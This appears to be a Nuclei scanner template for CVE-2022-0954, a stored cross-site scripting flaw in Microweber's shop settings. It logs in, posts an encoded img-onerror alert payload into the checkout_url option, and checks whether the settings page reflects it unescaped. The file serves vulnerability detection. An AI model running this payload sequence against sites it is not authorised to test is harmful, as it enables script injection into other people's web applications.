58 lines
2.1 KiB
YAML
58 lines
2.1 KiB
YAML
id: CVE-2022-0954
|
|
|
|
info:
|
|
name: Microweber - Cross-site Scripting
|
|
author: amit-jd
|
|
severity: medium
|
|
description: |
|
|
Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11.
|
|
reference:
|
|
- https://github.com/advisories/GHSA-8c76-mxv5-w4g8
|
|
- https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/
|
|
- https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0954
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2022-0954
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: "true"
|
|
tags: cve,cve2022,xss,microweber,huntr
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /api/user_login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username={{username}}&password={{password}}
|
|
|
|
- |
|
|
POST /api/save_option HTTP/2
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
Referer: {{BaseURL}}/admin/view:shop/action:options
|
|
|
|
option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
|
|
|
|
- |
|
|
POST /module/ HTTP/2
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
Referer: {{BaseURL}}/admin/view:shop/action:options
|
|
|
|
module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B
|
|
|
|
cookie-reuse: true
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_2,"true")'
|
|
- contains(body_3,'\"><img src=\"x\" onerror=\"alert(document.domain);\">\" placeholder=\"Use default')
|
|
- 'contains(all_headers_3,"text/html")'
|
|
- 'status_code_3==200'
|
|
condition: and
|